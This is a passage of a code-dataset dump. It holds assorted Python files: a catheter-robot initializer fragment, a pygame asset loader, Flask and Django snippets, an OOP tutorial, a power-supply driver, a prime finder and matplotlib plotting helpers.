Tensioning.\")\n else:\n state = \"WAIT_FOLLOW\"\n continue\n # inserted the tension_leader flag to skip over this step if only using the sheath\n if tension_leader:\n print(\"Tensioning Leader ...\")\n sys.stdout.flush()\n # LEADER TENSIONING\n g_PyAuris.SendIDMCommand(IntFromCmd(\"TENSION_LEADER\"))\n while (True):\n if (g_PyAuris.GetLeaderTensionStatus() == 2):\n state = \"WAIT_FOLLOW\"\n time.sleep(0.05)\n break\n if tension_sheath:\n print(\"Tensioning Sheath ...\")\n # print(\"D'application de tension a le gaine ...\")\n sys.stdout.flush()\n g_PyAuris.SendIDMCommand(IntFromCmd(\"TENSION_SHEATH\"))\n while (True):\n # print(g_PyAuris.GetSheathTensionStatus())\n if (g_PyAuris.GetSheathTensionStatus() == 2):\n # print(\"a: \", g_PyAuris.GetSheathTensionStatus())\n state = \"WAIT_FOLLOW\"\n time.sleep(0.05)\n break\n continue\n elif (state == \"WAIT_FOLLOW\"):\n if (status == IDMStates[\"Ready\"]):\n g_PyAuris.SendIDMCommand(IntFromCmd(\"START_FOLLOW\"))\n state = \"DO_FOLLOW\"\n continue\n elif (state == \"DO_FOLLOW\"):\n if (status == IDMStates[\"Ready\"]):\n time.sleep(0.5)\n g_PyAuris.SendIDMCommand(IntFromCmd(\"START_FOLLOW\"))\n if (status == IDMStates[\"Follow\"]):\n print(\"System Ready to drive.\")\n return 0\n else:\n print(\"Unknown state (\"+ state +\"): status (\"+ StateFromInt(status) +\")\")","sub_path":"catheter_simulation/robot/private/initialize_robot_communication.py","file_name":"initialize_robot_communication.py","file_ext":"py","file_size_in_byte":12709,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"582440709","text":"# Used this for serialization\r\n# and deserialization of files in the game\r\nimport pickle\r\nimport levelData\r\nimport os\r\nfrom functools import lru_cache\r\nimport pygame\r\nPATH_ROOT = os.getcwd()\r\nMAPS_PATH = os.path.join(PATH_ROOT, \"Maps\")\r\n\r\n\r\ndef list_maps():\r\n map_names = []\r\n if not os.path.exists(MAPS_PATH):\r\n os.mkdir(MAPS_PATH)\r\n return map_names\r\n for files in os.listdir(MAPS_PATH):\r\n # [-4] to remove extension and just get the map name\r\n map_names.append((os.path.join(MAPS_PATH, files), files[-4]))\r\n return map_names\r\n\r\n\r\ndef get_files_paths_from_folder(folder, *folders):\r\n file_paths = []\r\n curPath = os.path.join(PATH_ROOT, folder, *folders)\r\n if not os.path.exists(curPath):\r\n return None\r\n for file in os.listdir(curPath):\r\n file_paths.append(os.path.join(curPath, file))\r\n return file_paths\r\n\r\n\r\ndef load_level(level_path):\r\n with open(level_path, \"rb\") as level:\r\n level_data = pickle.load(level)\r\n levelData.Level.load(level_data)\r\n\r\n\r\ndef load_level_object(level_path):\r\n with open(level_path, \"rb\") as level:\r\n level_data = pickle.load(level)\r\n return level_data\r\n\r\n\r\ndef save_level(level_name, level):\r\n pickle.dump(level, open(os.path.join(\r\n MAPS_PATH, str(level_name) + \".map\"), \"wb\"))\r\n\r\n# The lru cache caches the results of the function\r\n# so I dont need to create a new surface object\r\n# everytime\r\n\r\n\r\n@lru_cache(maxsize=256)\r\ndef get_sprite(sprite_pack: str, sprite_position: int):\r\n\r\n filenames_list = get_files_paths_from_folder(\r\n \"Assets\", sprite_pack, \"Sprites\")\r\n if filenames_list != None:\r\n\r\n for pos, path in enumerate(sorted(filenames_list)):\r\n if pos == sprite_position:\r\n img = pygame.image.load(path).convert_alpha()\r\n img.set_colorkey((152, 0, 136))\r\n return img\r\n img = pygame.image.load(filenames_list[0]).convert_alpha()\r\n 
img.set_colorkey((152, 0, 136))\r\n return img\r\n return None\r\n\r\n\r\ndef get_audio(sprite_pack, state):\r\n import random\r\n filenames_list = get_files_paths_from_folder(\r\n \"Assets\", sprite_pack, str(state))\r\n if filenames_list == None:\r\n return None\r\n audioIndex = random.randint(0, len(filenames_list)-1)\r\n audioObj = pygame.mixer.Sound(filenames_list[audioIndex])\r\n return audioObj\r\n\r\n\r\n@lru_cache(maxsize=8)\r\ndef get_cached_audio(folder_name, sub_folder):\r\n filenames_list = get_files_paths_from_folder(\r\n \"Assets\", folder_name, sub_folder)\r\n if filenames_list == None:\r\n return None\r\n audioObj = pygame.mixer.Sound(filenames_list[0])\r\n return audioObj\r\n","sub_path":"The dawn of Otrozhny/gameIO.py","file_name":"gameIO.py","file_ext":"py","file_size_in_byte":2692,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"122353947","text":"from tkinter import filedialog\nfrom tkinter import simpledialog\nfrom tkinter import *\nimport os\nfrom pathlib import Path\nfrom PIL import Image, ImageDraw, ImageFont\n\ndef main():\n\n # refactor into functions\n meter_images = [] # the Pillow image objects\n instagram_xy, pixel_xy, basewidth, hsize = const_values()\n\n tk_root = Tk()\n # get image filenames\n meter_images_filenames = prompt_meter_images(tk_root)\n # get other values\n d = MyDialog(tk_root)\n\n text_for_image = make_text_for_image(d.date_str, d.fasted_hrs, d.ketone, d.bg)\n meter_image_objects = convert_2_image_objects(instagram_xy, meter_images, meter_images_filenames, pixel_xy, basewidth, hsize)\n\n outfile = make_outfilename(meter_images_filenames)\n\n out = make_composite_image(basewidth, hsize, instagram_xy, meter_image_objects, meter_images,\n text_for_image)\n out.save(outfile)\n out.show()\n\n\ndef make_composite_image(basewidth, hsize, instagram_xy, meter_image_objects, meter_images,\n text_for_image):\n base_image = Image.new(\"RGBA\", (instagram_xy[0], instagram_xy[1]), color='white')\n text_layer = Image.new('RGBA', base_image.size, (0, 0, 0, 0))\n font = ImageFont.truetype('/Library/Fonts/GillSans.ttc', 48, encoding='unic')\n text_drawing = ImageDraw.Draw(text_layer)\n text_drawing.text((200, 730), text_for_image, font=font, fill=(0, 0, 0, 255))\n out = Image.alpha_composite(base_image, text_layer).convert('RGB')\n print(meter_images[0].size)\n print(meter_images[1].size)\n out.paste(meter_image_objects[0], (0, 0, basewidth, hsize))\n out.paste(meter_image_objects[1], (basewidth, 0, basewidth * 2, hsize))\n return out\n\n\ndef convert_2_image_objects(instagram_xy, meter_images, meter_images_filenames, pixel_xy, basewidth, hsize):\n\n # TODO remove\n print(basewidth, hsize)\n for img_filename in meter_images_filenames:\n print(img_filename)\n meter_img = Image.open(img_filename)\n print(meter_img.size)\n meter_images.append(meter_img.resize((basewidth, hsize)))\n return meter_images\n\n\ndef make_outfilename(meter_images_filenames):\n image_folder = meter_images_filenames[0].parent.absolute()\n print(image_folder)\n outfile = Path(image_folder) / \"upload.jpg\"\n return outfile\n\n\ndef const_values():\n instagram_xy = (1080, 865)\n pixel_xy = (3024, 4032) # image size from my Pixel 2xl phone\n basewidth = int(instagram_xy[0] / 2)\n hsize = int((basewidth / pixel_xy[0]) * pixel_xy[1])\n return instagram_xy, pixel_xy, basewidth, hsize\n\n\n\ndef make_text_for_image(date_str, fasted_hrs_str, ketone_str, bg_str):\n #\"02/25/19 --- Fasted ~25 hrs\\nGKI 4.2 - Dr. 
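get_sprite relies on functools.lru_cache so that each (sprite_pack, sprite_position) pair hits the disk only once; the mechanism in miniature:

from functools import lru_cache

calls = 0

@lru_cache(maxsize=256)
def load(key):
    global calls
    calls += 1          # only runs on a cache miss
    return key.upper()

load('hero'); load('hero'); load('hero')
print(calls)  # 1 -- two of the three calls were served from the cache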
Boz Ratio 20\"\n gki, boz = calc_ratios(ketone_str, bg_str)\n text_str = f\"{date_str} --- Fasted ~{fasted_hrs_str} hrs\\nGKI {gki} Dr. Boz Ratio {boz}\"\n return text_str\n\ndef prompt_meter_images(root):\n meter_images = []\n cwd = os.getcwd()\n # assume source code in src folder and up one and down to ../images gets us to the top of the image folders\n image_dir = cwd.replace('src', 'images')\n\n # get ketone meter images\n # two images - one is blood ketone level and one is bloog glucose\n root.image_1 = filedialog.askopenfilename(initialdir=image_dir,\n title=\"Select first KetoMojo Image\", filetypes=(\n (\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\n meter_images.append(Path(root.image_1))\n root.image_2 = filedialog.askopenfilename(initialdir=image_dir,\n title=\"Select second KetoMojo Image\", filetypes=(\n (\"jpeg files\", \"*.jpg\"), (\"all files\", \"*.*\")))\n meter_images.append(Path(root.image_2))\n\n return meter_images\n\n\n\ndef calc_ratios(ketone_mmol_L, bg_mg_dL):\n ketone_mmol_L = float(ketone_mmol_L)\n bg_mg_dL = float(bg_mg_dL)\n gki = (round(((bg_mg_dL/18)/ketone_mmol_L),1))\n boz = (int(round(bg_mg_dL/ketone_mmol_L, 0)))\n return gki, boz\n\nclass MyDialog(simpledialog.Dialog):\n\n def body(self, master):\n\n Label(master, text=\"Ketone Level mmol/L:\").grid(row=0)\n Label(master, text=\"Blood Glucose:\").grid(row=1)\n Label(master, text=\"Fasted hours:\").grid(row=2)\n Label(master, text=\"Date mm/dd/yy:\").grid(row=3)\n self.e1 = Entry(master)\n self.e2 = Entry(master)\n self.e3 = Entry(master)\n self.e4 = Entry(master)\n\n self.e1.grid(row=0, column=1)\n self.e2.grid(row=1, column=1)\n self.e3.grid(row=2, column=1)\n self.e4.grid(row=3, column=1)\n\n return self.e1 # initial focus\n\n def apply(self):\n self.ketone = self.e1.get()\n self.bg = self.e2.get()\n self.fasted_hrs = self.e3.get()\n self.date_str = self.e4.get()\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","sub_path":"src/gen_image.py","file_name":"gen_image.py","file_ext":"py","file_size_in_byte":4848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"88769125","text":"def is_palindrome(word):\n if word.lower() == word[::-1].lower():\n print('Your word is a palindrome.')\n else:\n print('Your word is not a palindrome.')\n\n\ndef is_anagram(word1, word2):\n w1 = sorted(word1.lower().replace(' ', ''))\n w2 = sorted(word2.lower().replace(' ', ''))\n if w1 == w2:\n print('Your word is an anagram.')\n else:\n print('Your word is not an anagram.')\n\n\ndef checker():\n while True:\n query = int(input('1: Palindrome\\n2: Anagram\\n3: Quit\\n\\n'))\n if query == 1:\n word = input('Enter your word: ')\n is_palindrome(word)\n elif query == 2:\n word1 = input('Enter your first word: ')\n word2 = input('Enter your second word: ')\n is_anagram(word1, word2)\n elif query == 3:\n quit()\n\n\nchecker()\n","sub_path":"palindrome_and_anagram.py","file_name":"palindrome_and_anagram.py","file_ext":"py","file_size_in_byte":841,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"649021840","text":"from flask import Flask, render_template, Response, request\nfrom application import app\nimport random\n\n\n@app.route(\"/price\", methods=[\"GET\",\"POST\"])\ndef price():\n\n phone_deal = request.get_json()\n phone = {\"Iphone5\", \"Iphone6\", \"Iphone7\", \"Iphone8\"}\n colour = {\"red\", \"black\", \"white\"}\n price = (\"500\",\"600\",\"700\",\"800\")\n\n\n if phone == \"Iphone 5\":\n if colour == 
'black':\n price = '500'\n elif colour == 'white':\n price = '500'\n elif colour == 'red':\n price = '500'\n\n elif phone == \"Iphone 6\":\n if colour == 'black':\n price = '600'\n elif colour == 'white':\n price = '600'\n elif colour == 'red':\n price = '600'\n\n elif phone == \"I phone 7\":\n if colour == 'black':\n price = '700'\n elif colour == 'white':\n price = '700'\n elif colour == 'red':\n price = '700'\n\n elif phone == \"I phone 8\":\n if colour == 'black':\n price = '800'\n elif colour == 'white':\n price = '800'\n elif colour == 'red':\n price = '800'\n\n else:\n return Response(random.choice(price), mimetype = \"text/plain\")\n\n\n\n\n \n\n ","sub_path":"phone_api/service_4/application/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":1234,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"97577515","text":"\"\"\"\nThis script runs the application using a development server.\nIt contains the definition of routes and views for the application.\n\"\"\"\n\nfrom flask import Flask, request, redirect, url_for, render_template \nfrom flask_debugtoolbar import DebugToolbarExtension\n\napp = Flask(__name__)\napp.config.from_object('config')\ntoolbar = DebugToolbarExtension(app)\n\n# Make the WSGI interface available at the top level so wfastcgi can get it.\nwsgi_app = app.wsgi_app\n\n\n@app.route('/')\ndef index():\n return render_template('index.html')\n\n\n@app.route('/j2')\ndef j2():\n return render_template('j2_query.html')\n\n\n@app.route('/process', methods=['POST'])\ndef process():\n _username = request.form.get('username')\n\n if _username:\n return render_template('j2_response.html', username = _username)\n else:\n return 'Please go back and enter your name . . . 
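With the table-driven price() above, the endpoint can be exercised end to end using Flask's built-in test client; a hypothetical check, not part of the service:

with app.test_client() as client:
    resp = client.post('/price', json={'phone': 'Iphone6', 'colour': 'red'})
    print(resp.get_data(as_text=True))  # '600'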
', 400\n\n\n@app.route('/free_button', methods=['GET', 'POST'])\ndef free_button():\n    return 'WEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEE'\n\n\nif __name__ == '__main__':\n    import os\n    HOST = os.environ.get('SERVER_HOST', 'localhost')\n    try:\n        PORT = int(os.environ.get('SERVER_PORT', '5555'))\n    except ValueError:\n        PORT = 5555\n    app.run(HOST, PORT)\n","sub_path":"explore_flask_pubs/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"471254033","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n'Object-oriented programming'\n\n__author__ = 'garyhu'\n\nimport types;\n\nclass Person(object):\n\n    # __slots__ controls attribute creation: only names listed in __slots__ may be set on the class or an instance\n    __slots__ = ('__name','__age','birth','id','gender','sayHi'); # a tuple of the attribute names that may be bound\n\n    # define a class attribute\n    # scope = 123;  # temporarily commented out\n    \n    # make the object usable in a with statement\n    def __enter__(self):\n        print('begin with')\n        return self;\n    \n    def __exit__(self,exc_type,exc_value,traceback):\n        if exc_type:\n            print('Error')\n        else :\n            print('End')\n\n    def __init__(self,name,age):\n        self.__name = name;\n        self.__age = age;\n\n    def print_person(self):\n        print(\"name: %s, age: %d\" % (self.__name,self.__age)) \n    \n    def getName(self):\n        return self.__name;\n\n    def getAge(self):\n        return self.__age; \n\n    def setName(self,value):\n        self.__name = value;\n\n    def setAge(self,value):\n        self.__age = value; \n\n    def checkType(self,fn):\n        if type(fn) == types.FunctionType:\n            print(\"user-defined function\");\n        elif type(fn) == types.BuiltinFunctionType:\n            print(\"built-in function\");\n        elif type(fn) == types.LambdaType:\n            print(\"LambdaType\");\n        elif type(fn) == types.GeneratorType:\n            print(\"generator\"); \n        else :\n            print(\"cannot determine the type\"); \n\nP = Person(\"Juddy\",23);\n\nprint(P._Person__name)\nP.setName(\"Tommy\")\nprint(P.getName());\nprint(P.getAge());\nP.setAge(30)\nP.print_person();\n\nprint(type(P) == Person);\n\nfn = (x for x in range(10));\nprint(fn)\nP.checkType(fn);\n\n# query an object attribute\nif hasattr(P,'__name'):\n    print(getattr(P,'__name'))\n\n# if the attribute does not exist, supplying a default value avoids the error\ngetattr(P,'dog',\"wow\") \n\n# set an attribute that does not exist yet\nif not hasattr(P,'birth'):\n    setattr(P,'birth','2017-03-10') \n\nprint(P.birth);\n\n# check whether an object method exists\nprint(hasattr(P,'getAge'))\n\n# print(\"access the class attribute via the instance: %d\" % P.scope)\n# print(\"access the class attribute via the class: %d\" % Person.scope)\n\nprint('<------------------------------>')\n\n# an instance attribute with the same name shadows the class attribute, but does not modify its value\n# P.scope = 9999;\n\n# print(\"access the class attribute via the instance: %d\" % P.scope)\n# print(\"access the class attribute via the class: %d\" % Person.scope)\n# print('<------------------------------>')\n\n\n# delete the instance attribute; lookups then find the class attribute again\n# del P.scope;\n\n# print(\"access the class attribute via the instance: %d\" % P.scope)\n# print(\"access the class attribute via the class: %d\" % Person.scope)\n# print('<------------------------------>')\n\n\n# dir() lists all attributes of the object\nprint(dir(P));\n\n# define a method for a single instance\ndef sayHi(self,username):\n    print(\"hello %s\" % username)\n\n# this binds the function to the instance P only; other instances cannot call it\nP.sayHi = types.MethodType(sayHi,P);\n\nP.sayHi('Lucy');\n\n# bind it on the class instead, so every instance can use it\nPerson.sayHi = sayHi;\n\nperson = Person(\"July.An\",43);\nperson.sayHi(\"Marry\");\n\n# __slots__ controls attribute creation: only names listed in __slots__ may be set on the class or an instance\n# person.rate = 100; # 'rate' is not in __slots__, so this would raise an error\n\n\n# __slots__ only restricts instances of the class itself, not of its subclasses\nclass SubPerson(Person):\n\n    def __init__(self,name,age,link):\n        self.__name = name;\n        self.__age = age;\n        self._link = link;\n    \n    @property\n    def rate(self):\n        return self._rate;\n\n    @rate.setter\n    def rate(self,val):\n        if not isinstance(val,(int,float)):\n            raise ValueError(\"rate must be an integer or a float\");\n        elif val < 0 or val > 1 :\n            raise ValueError(\"value must be between 0 and 1\");\n        \n        
self._rate = val;\n\n    # define a read-only property\n    @property\n    def link(self):\n        return self._link; \n\n    def __str__(self):\n        return '{ SubPerson name : %s, age: %d, link: %s }' % (self.__name,self.__age,self._link); \n\n    __repr__ = __str__;\n\n    # called when an attribute lookup on the instance fails\n    def __getattr__(self,attr):\n        print(\"the %s is not defined!!!\" % attr);\n\n    \n    def __call__(self):\n        print('the instance itself was called'); \n\n\nsP = SubPerson('Hanny',12,\"www.toc.cn\");\n\n# print the instance\nprint(sP);\n\nsP.write = lambda x : x*x;\n\nval = sP.write(12);\nprint(val)\n\nsP.rate = 0.8;\n\nprint(sP.rate);\n\n# link is a read-only property and cannot be assigned\n# sP.link = 122;\nprint(sP.link);\n\nsP();\n\n# when the attribute is undefined, the class's __getattr__ is invoked\nsP.dsf;\n\n# callable() checks whether an object is 'callable'\nprint(callable(sP));\nprint(callable(P));\nprint(callable(max));\nprint(callable('abc'));\n\n\nwith Person('DuoDuo',1) as pp1:\n    n = pp1.getName()\n    print(n);\n","sub_path":"base/python_obj.py","file_name":"python_obj.py","file_ext":"py","file_size_in_byte":4919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"628177981","text":"\"\"\"graduationwork URL Configuration\n\nThe `urlpatterns` list routes URLs to views. For more information please see:\n    https://docs.djangoproject.com/en/3.0/topics/http/urls/\nExamples:\nFunction views\n    1. Add an import: from my_app import views\n    2. Add a URL to urlpatterns: path('', views.home, name='home')\nClass-based views\n    1. Add an import: from other_app.views import Home\n    2. Add a URL to urlpatterns: path('', Home.as_view(), name='home')\nIncluding another URLconf\n    1. Import the include() function: from django.urls import include, path\n    2. Add a URL to urlpatterns: path('blog/', include('blog.urls'))\n\"\"\"\nfrom django.contrib import admin\nfrom django.urls import path, re_path, include\nfrom automated_system import views\nfrom django.views.generic import RedirectView\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib.auth.forms import AuthenticationForm\n\nAuthenticationForm.login_is_active = \"nav_item_active\"\n\nurlpatterns = [\n    path('', views.index, name='home'),\n    path('admin/', admin.site.urls),\n    path('store', views.store, name='store'),\n    path('storage', views.storage, name='storage'),\n    path('about', views.about, name='about'),\n    path('login', auth_views.LoginView.as_view(\n        template_name='auth/login.html', authentication_form=AuthenticationForm), name='login'),\n    path('logout', auth_views.LogoutView.as_view(\n        template_name='index.html'), name='logout'),\n    path('products', views.products, name='products'),\n    path('profile', views.profile, name='profile'),\n    path('failures', views.failures, name='failures'),\n    path('analytics', views.analytics, name='analytics'),\n    path('favicon.ico', RedirectView.as_view(\n        url='/static/images/favicon.ico', permanent=True)),\n]\n","sub_path":"graduationwork/graduationwork/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"395921949","text":"import os\nimport json\nimport logging\n\n\ndef start_logging(who, debug):\n    logging.basicConfig(\n        format=f\"%(asctime)s {who}: %(levelname)s: %(message)s\",\n        level=logging.DEBUG if debug else logging.INFO,\n    )\n\n\ndef get_master_version():\n    env = os.environ.get(\"AS_DATA_ROOT\", \".\")\n    tag = os.environ.get(\"AS_CANONICAL_REGION\", None)\n    if not tag:\n        logging.warning(\"You need to set AS_CANONICAL_REGION. 
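__getattr__ only runs after normal attribute lookup fails, which is why sP.dsf above triggers the message while sP.rate does not; a minimal illustration:

class Fallback:
    x = 1
    def __getattr__(self, name):
        return '{} is not defined'.format(name)

f = Fallback()
print(f.x)  # 1 -- found normally, __getattr__ never runs
print(f.y)  # 'y is not defined' -- lookup failed, so __getattr__ answers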
Defaulting to jp for now.\")\n tag = \"jp:ja\"\n\n region, lang = tag.split(\":\", 1)\n\n root = os.path.join(env, region)\n try:\n with open(os.path.join(root, \"astool_store.json\"), \"r\") as memof:\n memo = json.load(memof)\n return os.path.join(root, \"masters\", memo[\"master_version\"]), lang\n except (FileNotFoundError, KeyError):\n return root, lang\n\n","sub_path":"common_config.py","file_name":"common_config.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"485402916","text":"\"\"\"\n\nPython Interchangeable Virtual Instrument Library\n\nphilipsPM2810.py\nCopyright (c) 2017 Coburn Wightman\n\nDerived from rigolDP800.py \nCopyright (c) 2013-2017 Alex Forencich\n\nPermission is hereby granted, free of charge, to any person obtaining a copy\nof this software and associated documentation files (the \"Software\"), to deal\nin the Software without restriction, including without limitation the rights\nto use, copy, modify, merge, publish, distribute, sublicense, and/or sell\ncopies of the Software, and to permit persons to whom the Software is\nfurnished to do so, subject to the following conditions:\n\nThe above copyright notice and this permission notice shall be included in\nall copies or substantial portions of the Software.\n\nTHE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\nIMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY\nFITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\nAUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\nLIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\nOUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\nTHE SOFTWARE.\n\n\"\"\"\n\nfrom .philipsPM2800 import *\n\nclass philipsPM2810(philipsPM2800):\n \"Philips/Fluke Autoranging PM2810 series IVI DC power supply driver\"\n \n def __init__(self, *args, **kwargs):\n self.__dict__.setdefault('_instrument_id', '')\n \n super(philipsPM2810, self).__init__(*args, **kwargs)\n \n self._output_count = 3\n\n # Available output modules for the PM281x series\n self._output_spec = [\n {\n 'range': {\n 'P30V': (30.0, 10.0)\n },\n 'ovp_max': 32.0,\n 'ocp_max': 10.1,\n 'voltage_max': 30.0,\n 'current_max': 10.0,\n 'power_max' : 60\n \n },\n {\n 'range': {\n 'P60V': (60.0, 5.0)\n },\n 'ovp_max': 62.0,\n 'ocp_max': 5.1,\n 'voltage_max': 60.0,\n 'current_max': 5.0,\n 'power_max' : 60\n },\n {\n 'range': {\n 'P60V': (60.0, 10.0)\n },\n 'ovp_max': 62.0,\n 'ocp_max': 10.1,\n 'voltage_max': 60.0,\n 'current_max': 10.0,\n 'power_max' : 120\n }\n ]\n \n #self._memory_size = 10\n \n self._identity_description = \"Philips/Fluke Autoranging PM2810 series IVI DC power supply driver\"\n self._identity_identifier = \"\"\n self._identity_revision = \"\"\n self._identity_vendor = \"\"\n self._identity_instrument_manufacturer = \"Philips NV\"\n self._identity_instrument_model = \"\"\n self._identity_instrument_firmware_revision = \"\"\n self._identity_specification_major_version = 3\n self._identity_specification_minor_version = 0\n self._identity_supported_instrument_models = ['PM2811', 'PM2812', 'PM2813']\n \n self._init_outputs()\n \n\n # 281x are switchmode supplies therefore power limited \n def _output_query_current_limit_max(self, index, voltage_level):\n index = ivi.get_index(self._output_name, index)\n if voltage_level < 0 or voltage_level > self._output_spec[index]['voltage_max']:\n raise 
ivi.OutOfRangeException()\n if voltage_level > 0:\n imax = self._output_spec[index]['power_max'] / voltage_level\n if imax > self._output_spec[index]['current_max']:\n imax = self._output_spec[index]['current_max']\n else:\n imax = self._output_spec[index]['current_max']\n return imax\n \n def _output_query_voltage_level_max(self, index, current_limit):\n index = ivi.get_index(self._output_name, index)\n if current_limit < 0 or current_limit > self._output_spec[index]['current_max']:\n raise ivi.OutOfRangeException()\n elif current_limit > 0:\n vmax = self._output_spec[index]['power_max'] / current_limit\n if vmax > self._output_spec[index]['voltage_max']:\n vmax = self._output_spec[index]['voltage_max']\n else:\n vmax = self._output_spec[index]['voltage_max']\n return vmax\n\n \n","sub_path":"contrib/philipsPM2810.py","file_name":"philipsPM2810.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"595971016","text":"#!/usr/bin/python3\n\nfrom lib import isprime\n\n# Let's just run through all the odd natural numbers starting at 3\nprimes = [2]\ntestnum = 3\nwhile len(primes) != 10001:\n if isprime(testnum):\n primes.append(testnum)\n testnum += 2\n\nprint(primes[-1])\n","sub_path":"pe0007.py","file_name":"pe0007.py","file_ext":"py","file_size_in_byte":257,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"138198378","text":"# Dependency imports\nfrom flask import Flask, request\n\n\n# Flask server creation\nMY_APP = Flask(__name__)\n\n# default route definition\n@MY_APP.route('/', methods=['GET', 'POST'])\ndef root():\n if request.method == 'GET':\n return 'coucou'\n else:\n return f'Bonjour {request.get_json()[\"name\"]}'\n\n\n# App entry point\nif __name__ == '__main__':\n MY_APP.run('0.0.0.0', 8080, debug=True)\n","sub_path":"simpleRestAPI/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":401,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"639503211","text":"import os\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport torch\nimport torchvision\nfrom functionalities import traverser as tra\nfrom functionalities import dataloader as dl\n\ndef plot(x, y, x_label, y_label, plot_label, title, filename, sub_dim=None, figsize=(15, 10), font_size=24, y_log_scale=False):\n \"\"\"\n Generate a plot based on given arguments. If y is a 2d numpy array/list, multiple plots will be generated within one\n diagram. If additionally x is also a 2d numpy array/list, multiple subplots will be generated.\n\n :param x: numpy array/list of x values to plot. If multiple subplots should be generated then x will be a 2d numpy\n array/list.\n :param y: numpy array/list of corresponding y values to plot. If multiple plots should be generated then y will be a\n 2d numpy array/list.\n :param x_label: label of x-axis\n :param y_label: label of y-axis\n :param plot_label: label for plots (appears in legend)\n :param title: title for the plot. Should be a list if multiple plots are generated.\n :param filename: file name under which the plot will be saved.\n :param sub_dim: dimensions of subplots. 
Only required if the dimensions of both x and y are 2.\n    :param figsize: the size of the generated plot\n    :param font_size: font size of labels\n    :return: None\n    \"\"\"\n\n    plt.rcParams.update({'font.size': font_size})\n\n    if not ('numpy' in str(type(x))):\n        try:\n            x = np.array(x)\n        except TypeError:\n            print(\"x is neither a numpy array nor a python list\")\n\n    if not ('numpy' in str(type(y))):\n        try:\n            y = np.array(y)\n        except TypeError:\n            print(\"y is neither a numpy array nor a python list\")\n\n    dim_x = len(x.shape)\n    dim_y = len(y.shape)\n\n    if (dim_x != 1 and dim_x != 2) or (dim_y != 1 and dim_y != 2) or (dim_x == 2 and dim_y == 1):\n        raise ValueError(\"x has dimension {} and y has dimension {}\".format(dim_x, dim_y))\n\n    if dim_x == 1 and dim_y == 1:\n        fig, ax = plt.subplots(1, 1, figsize=figsize)\n        ax.plot(x, y, label=plot_label)\n        ax.set_xlabel(x_label)\n        ax.set_ylabel(y_label)\n        if y_log_scale:\n            ax.set_yscale('log')\n        ax.set_title(title)\n        ax.grid(True)\n    elif dim_x == 1 and dim_y == 2:\n        fig, ax = plt.subplots(1, 1, figsize=figsize)\n\n        for i, y_part in enumerate(y):\n            ax.plot(x, y_part, label=plot_label[i])\n\n        ax.set_xlabel(x_label)\n        ax.set_ylabel(y_label)\n        if y_log_scale:\n            ax.set_yscale('log')\n        ax.set_title(title)\n        ax.grid(True)\n        ax.legend()\n    elif dim_x == 2 and dim_y == 2:\n        if sub_dim[0] * sub_dim[1] != len(y) or sub_dim[0] * sub_dim[1] != len(x):\n            raise ValueError(\"sub_dim dimension {} does not match dimension of x {} or y {}\".format(sub_dim, len(y),\n                                                                                                    len(x)))\n        fig, ax = plt.subplots(sub_dim[0], sub_dim[1], figsize=figsize)\n\n        counter = 0\n        for i in range(sub_dim[0]):\n            for j in range(sub_dim[1]):\n                ax[i, j].plot(x[counter], y[counter], label=plot_label[counter])\n                ax[i, j].set_xlabel(x_label[counter])\n                ax[i, j].set_ylabel(y_label[counter])\n                if y_log_scale:\n                    ax[i, j].set_yscale('log')  # log scale on this subplot, not on the whole axes array\n                ax[i, j].set_title(title[counter])\n                ax[i, j].grid(True)\n                counter += 1\n\n    plt.tight_layout()\n\n    subdir = \"./plot\"\n    if not os.path.exists(subdir):\n        os.makedirs(subdir)\n\n    fig.savefig(os.path.join(subdir, filename + \".png\"), transparent = True, bbox_inches = 'tight', pad_inches = 0)\n\n    plt.show()\n\n\ndef imshow(img, figsize=(30, 30), filename=None):\n    \"\"\"\n    Custom modified imshow function.\n\n    :param img: image to plot\n    :param figsize: the size of the generated plot\n    :param filename: file name under which the plot will be saved. (optional)\n    :return: None\n    \"\"\"\n    img = torch.clamp(img, 0, 1)\n    img = img.to('cpu')\n    npimg = img.numpy()\n    plt.figure(figsize=figsize)  # create the figure at the requested size\n    plt.imshow(np.transpose(npimg, (1, 2, 0)))\n\n    if filename is not None:\n        subdir = \"./plot\"\n        if not os.path.exists(subdir):\n            os.makedirs(subdir)\n\n        plt.savefig(os.path.join(subdir, filename + \".png\"), 